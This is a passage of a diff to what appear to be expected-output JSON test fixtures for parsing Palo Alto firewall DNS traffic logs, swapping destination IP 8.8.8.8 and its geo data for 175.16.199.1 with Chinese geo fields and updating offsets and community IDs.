+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6321,7 +6132,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6333,12 +6144,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 26649,
+        "log.offset": 26949,
         "network.application": "dns",
         "network.bytes": 269,
         "network.community_id": [
-            "1:aMEfJV/f54B1+0RNtWjw49JfNFU=",
-            "1:gHWCOTtilTTqOn7fOKh7zVq45Xw="
+            "1:XeWsMGIbT/x162pVo0NCV89u0gM=",
+            "1:uD+W7tTSk79NUi3PpwMi06q1UWI="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6355,12 +6166,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24171",
-        "panw.panos.network.nat.community_id": "1:gHWCOTtilTTqOn7fOKh7zVq45Xw=",
+        "panw.panos.network.nat.community_id": "1:uD+W7tTSk79NUi3PpwMi06q1UWI=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091169,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6375,14 +6186,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 172,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6407,17 +6218,18 @@
         "client.nat.port": 28944,
         "client.packets": 1,
         "client.port": 49195,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 134,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6431,7 +6243,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6443,12 +6255,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 27097,
+        "log.offset": 27407,
         "network.application": "dns",
         "network.bytes": 212,
         "network.community_id": [
-            "1:OGDvpe1+4KQfCsxk0I61jm0+DIc=",
-            "1:WgGQfntwYS3voQPhGfI/qhx0SVk="
+            "1:45Rl8R/9Ldlq3xqwvMO1f+V8LQA=",
+            "1:PTYX9HnjKczQum2EUlGgqrCBONE="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6465,12 +6277,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24069",
-        "panw.panos.network.nat.community_id": "1:OGDvpe1+4KQfCsxk0I61jm0+DIc=",
+        "panw.panos.network.nat.community_id": "1:PTYX9HnjKczQum2EUlGgqrCBONE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091170,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6485,14 +6297,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 134,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6517,17 +6329,18 @@
         "client.nat.port": 13415,
         "client.packets": 1,
         "client.port": 17266,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 179,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6541,7 +6354,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6553,12 +6366,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 27546,
+        "log.offset": 27866,
         "network.application": "dns",
         "network.bytes": 252,
         "network.community_id": [
-            "1:RM5edUgZPywM/hIejzFVba+A4co=",
-            "1:po/vy4RoD5WeFPgCZnduQkE47yY="
+            "1:SePV/IDh1jjVyN5T4udJ8C1xa+I=",
+            "1:WZDvBFVegIhMMGv+nhAyDd8fRs0="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6575,12 +6388,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24282",
-        "panw.panos.network.nat.community_id": "1:po/vy4RoD5WeFPgCZnduQkE47yY=",
+        "panw.panos.network.nat.community_id": "1:WZDvBFVegIhMMGv+nhAyDd8fRs0=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091171,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6595,14 +6408,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 179,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6627,17 +6440,18 @@
         "client.nat.port": 2489,
         "client.packets": 1,
         "client.port": 48631,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 218,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6651,7 +6465,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6663,12 +6477,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 27995,
+        "log.offset": 28325,
         "network.application": "dns",
         "network.bytes": 308,
         "network.community_id": [
-            "1:jJo7FJWI3gHbC96nTsyT17hVP98=",
-            "1:wIxYOe++IxscmxBcRwrPGEIlZF4="
+            "1:p7bJDKhUeffJiJ7yfQZH2E44Dvs=",
+            "1:qcxcaTpyWF+yTo0gacaLCRvVTdc="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6685,12 +6499,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24218",
-        "panw.panos.network.nat.community_id": "1:wIxYOe++IxscmxBcRwrPGEIlZF4=",
+        "panw.panos.network.nat.community_id": "1:qcxcaTpyWF+yTo0gacaLCRvVTdc=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091172,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6705,14 +6519,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 218,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6737,17 +6551,18 @@
         "client.nat.port": 49328,
         "client.packets": 1,
         "client.port": 58540,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 172,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6761,7 +6576,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6773,12 +6588,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 28443,
+        "log.offset": 28783,
         "network.application": "dns",
         "network.bytes": 249,
         "network.community_id": [
-            "1:eWhg/7DfJGJNfW90sKt5WEYnI9g=",
-            "1:xN7R3QI47jVAQhgJrOAvdsu+oes="
+            "1:JR/9wbsZU1i/WfnfKXg/pJ74JRA=",
+            "1:o5e7XAcaqhJxDKgm/3IDk32KJeg="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6795,12 +6610,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24200",
-        "panw.panos.network.nat.community_id": "1:xN7R3QI47jVAQhgJrOAvdsu+oes=",
+        "panw.panos.network.nat.community_id": "1:JR/9wbsZU1i/WfnfKXg/pJ74JRA=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091173,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6815,14 +6630,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 172,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6847,17 +6662,18 @@
         "client.nat.port": 36036,
         "client.packets": 1,
         "client.port": 42678,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 305,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -6871,7 +6687,7 @@
         "event.end": "2018-11-30T16:09:13.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:13.000-02:00",
         "event.timezone": "-02:00",
@@ -6883,12 +6699,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 28892,
+        "log.offset": 29242,
         "network.application": "dns",
         "network.bytes": 379,
         "network.community_id": [
-            "1:BxuDgAhR5Rh55XOXYnYF+6GKhps=",
-            "1:dhAcAsMUxJrHfinQA5Q7eglS7T0="
+            "1:Bc4xJ7lD1NlCA/3AmAVsQNYES64=",
+            "1:h1oeveqcJzaFWRZabjDssyQizPo="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -6905,12 +6721,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24224",
-        "panw.panos.network.nat.community_id": "1:BxuDgAhR5Rh55XOXYnYF+6GKhps=",
+        "panw.panos.network.nat.community_id": "1:Bc4xJ7lD1NlCA/3AmAVsQNYES64=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091174,
         "panw.panos.source.interface": "ethernet1/2",
@@ -6925,14 +6741,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 305,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -6958,17 +6774,7 @@
         "client.packets": 1,
         "client.port": 16576,
         "destination.address": "66.28.0.45",
-        "destination.as.number": 174,
-        "destination.as.organization.name": "Cogent Communications",
         "destination.bytes": 527,
-        "destination.geo.city_name": "Lanham",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.9705,
-        "destination.geo.location.lon": -76.8388,
-        "destination.geo.region_iso_code": "US-MD",
-        "destination.geo.region_name": "Maryland",
         "destination.ip": "66.28.0.45",
         "destination.nat.ip": "66.28.0.45",
         "destination.nat.port": 53,
@@ -6996,7 +6802,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 29341,
+        "log.offset": 29701,
         "network.application": "dns",
         "network.bytes": 603,
         "network.community_id": [
@@ -7070,17 +6876,18 @@
         "client.nat.port": 45809,
         "client.packets": 1,
         "client.port": 39830,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 153,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -7094,7 +6901,7 @@
         "event.end": "2018-11-30T16:09:14.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:14.000-02:00",
         "event.timezone": "-02:00",
@@ -7106,12 +6913,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 29796,
+        "log.offset": 30156,
         "network.application": "dns",
         "network.bytes": 242,
         "network.community_id": [
-            "1:KZzZcwEN4cbaTck1z2Wa/3P3YjU=",
-            "1:MxVcaRP5Y1xyEiYiNsmO1lVcN+A="
+            "1:BOB9wtAfwP5+6JDPoEYJazGGY1w=",
+            "1:n7na652DSILYNbdII1evSRQ59uI="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -7128,12 +6935,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24183",
-        "panw.panos.network.nat.community_id": "1:MxVcaRP5Y1xyEiYiNsmO1lVcN+A=",
+        "panw.panos.network.nat.community_id": "1:BOB9wtAfwP5+6JDPoEYJazGGY1w=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091176,
         "panw.panos.source.interface": "ethernet1/2",
@@ -7148,14 +6955,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 153,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -7180,17 +6987,18 @@
